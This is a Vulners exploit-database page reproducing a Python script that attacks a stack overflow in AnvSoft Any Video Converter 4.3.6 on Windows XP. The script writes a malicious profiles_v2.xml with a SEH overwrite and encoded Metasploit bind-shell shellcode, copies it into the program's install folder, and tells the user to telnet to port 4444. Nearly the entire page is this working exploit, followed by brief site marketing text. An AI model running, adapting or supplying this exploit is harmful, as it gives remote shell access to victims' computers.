Vulners
Lucene search
AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit
#!/usr/bin/python
#
# Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow
# Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research
# Website: http://www.spentera.com
# Platform: Windows
# Tested on: Windows XP SP3
# Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/)
#
import os,shutil,time,sys
def banner():
print "\n\tAnvSoft Any Video Converter 4.3.6 Stack Overflow"
print "\tbased on POC by Vulnerability-Lab (www.vulnerability-lab.com)"
print "\tcikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research\n"
print "\t----------------------------------------------------\n"
junk = "\x90" * 328
nseh = "\xeb\x06\x90\x90"
seh = "\xe4\xf3\x04\x10"
# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
# badchars = "\x00\x0a\x0d\x22\x26\x3e"
code = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x48"
"\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x58\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x59\x79\x69\x6c\x30"
"\x6a\x78\x6b\x32\x6d\x78\x68\x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x41"
"\x70\x6c\x4b\x30\x6c\x51\x34\x66\x44\x6e\x6b\x72\x65\x35\x6c\x6c"
"\x4b\x73\x4c\x67\x75\x30\x78\x67\x71\x68\x6f\x4c\x4b\x50\x4f\x47"
"\x68\x4e\x6b\x41\x4f\x67\x50\x55\x51\x7a\x4b\x42\x69\x6c\x4b\x74"
"\x74\x4c\x4b\x36\x61\x78\x6e\x74\x71\x4b\x70\x4f\x69\x6e\x4c\x4f"
"\x74\x4b\x70\x70\x74\x65\x57\x4a\x61\x6b\x7a\x56\x6d\x47\x71\x4b"
"\x72\x5a\x4b\x58\x74\x35\x6b\x72\x74\x75\x74\x34\x68\x30\x75\x4b"
"\x55\x4c\x4b\x43\x6f\x57\x54\x36\x61\x68\x6b\x72\x46\x4e\x6b\x56"
"\x6c\x30\x4b\x6e\x6b\x43\x6f\x65\x4c\x67\x71\x4a\x4b\x44\x43\x54"
"\x6c\x4c\x4b\x6f\x79\x70\x6c\x74\x64\x35\x4c\x70\x61\x39\x53\x57"
"\x41\x69\x4b\x50\x64\x6c\x4b\x47\x33\x70\x30\x6c\x4b\x57\x30\x76"
"\x6c\x6c\x4b\x72\x50\x45\x4c\x6e\x4d\x4c\x4b\x53\x70\x43\x38\x63"
"\x6e\x55\x38\x6c\x4e\x30\x4e\x54\x4e\x78\x6c\x42\x70\x69\x6f\x6e"
"\x36\x53\x56\x63\x63\x70\x66\x33\x58\x54\x73\x36\x52\x53\x58\x61"
"\x67\x34\x33\x57\x42\x41\x4f\x53\x64\x39\x6f\x5a\x70\x45\x38\x68"
"\x4b\x7a\x4d\x39\x6c\x57\x4b\x66\x30\x6b\x4f\x49\x46\x63\x6f\x4b"
"\x39\x79\x75\x65\x36\x4f\x71\x58\x6d\x47\x78\x63\x32\x70\x55\x73"
"\x5a\x37\x72\x4b\x4f\x68\x50\x70\x68\x4e\x39\x74\x49\x4c\x35\x4c"
"\x6d\x71\x47\x4b\x4f\x4a\x76\x32\x73\x63\x63\x50\x53\x50\x53\x31"
"\x43\x52\x63\x73\x63\x47\x33\x33\x63\x59\x6f\x4e\x30\x31\x76\x30"
"\x68\x77\x61\x51\x4c\x31\x76\x51\x43\x4d\x59\x6a\x41\x6f\x65\x45"
"\x38\x4f\x54\x66\x7a\x50\x70\x6a\x67\x66\x37\x79\x6f\x6e\x36\x61"
"\x7a\x64\x50\x33\x61\x42\x75\x69\x6f\x6a\x70\x33\x58\x4c\x64\x6e"
"\x4d\x56\x4e\x39\x79\x73\x67\x4b\x4f\x7a\x76\x72\x73\x70\x55\x59"
"\x6f\x58\x50\x61\x78\x6a\x45\x41\x59\x6d\x56\x42\x69\x66\x37\x4b"
"\x4f\x4e\x36\x46\x30\x76\x34\x31\x44\x50\x55\x69\x6f\x4e\x30\x6e"
"\x73\x75\x38\x6b\x57\x64\x39\x49\x56\x43\x49\x46\x37\x39\x6f\x4b"
"\x66\x66\x35\x39\x6f\x68\x50\x75\x36\x62\x4a\x43\x54\x72\x46\x65"
"\x38\x65\x33\x70\x6d\x4f\x79\x6b\x55\x32\x4a\x46\x30\x46\x39\x41"
"\x39\x38\x4c\x4d\x59\x4d\x37\x41\x7a\x52\x64\x4f\x79\x6b\x52\x70"
"\x31\x4b\x70\x4c\x33\x4f\x5a\x49\x6e\x77\x32\x76\x4d\x69\x6e\x31"
"\x52\x64\x6c\x4e\x73\x4e\x6d\x43\x4a\x34\x78\x6e\x4b\x6e\x4b\x6c"
"\x6b\x50\x68\x62\x52\x4b\x4e\x78\x33\x54\x56\x4b\x4f\x73\x45\x32"
"\x64\x39\x6f\x38\x56\x61\x4b\x32\x77\x43\x62\x70\x51\x73\x61\x71"
"\x41\x63\x5a\x44\x41\x31\x41\x43\x61\x63\x65\x56\x31\x6b\x4f\x4e"
"\x30\x53\x58\x4c\x6d\x5a\x79\x54\x45\x58\x4e\x33\x63\x4b\x4f\x6b"
"\x66\x50\x6a\x39\x6f\x4b\x4f\x70\x37\x4b\x4f\x38\x50\x4e\x6b\x62"
"\x77\x49\x6c\x4c\x43\x49\x54\x43\x54\x69\x6f\x5a\x76\x56\x32\x79"
"\x6f\x6e\x30\x50\x68\x53\x4e\x6a\x78\x7a\x42\x44\x33\x52\x73\x39"
"\x6f\x4e\x36\x79\x6f\x68\x50\x48")
sisa = "\x90" * (1000-len(code))
poc = "<root>\n"
poc+= "<categories>\n"
poc+= "<category name=\""+junk+nseh+seh+code+sisa+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc+= "</categories>\n"
poc+= "<groups></groups>\n<profiles></profiles>\n</root>\n"
file = "profiles_v2.xml"
splash=os.path.abspath(file)
profdir="C:\Program Files\AnvSoft\Any Video Converter Professional"
writeFile = open(file, "w")
if os.name == 'nt':
if os.path.isdir(profdir):
try:
writeFile.write(poc)
banner()
print "[*] Creating the malicious",file
time.sleep(1)
print "[*] Malicious",file,"created.."
writeFile.close()
shutil.copy2(splash,profdir)
print "[*] File",file,"has been copied to",profdir
print "[*] Now open AnvSoft program and telnet to port 4444"
except IOError:
print "[-] Could not write to destination folder, check permission.."
sys.exit()
else:
print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?"
sys.exit()
else:
print "[-] Please run this script on Windows."
sys.exit()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1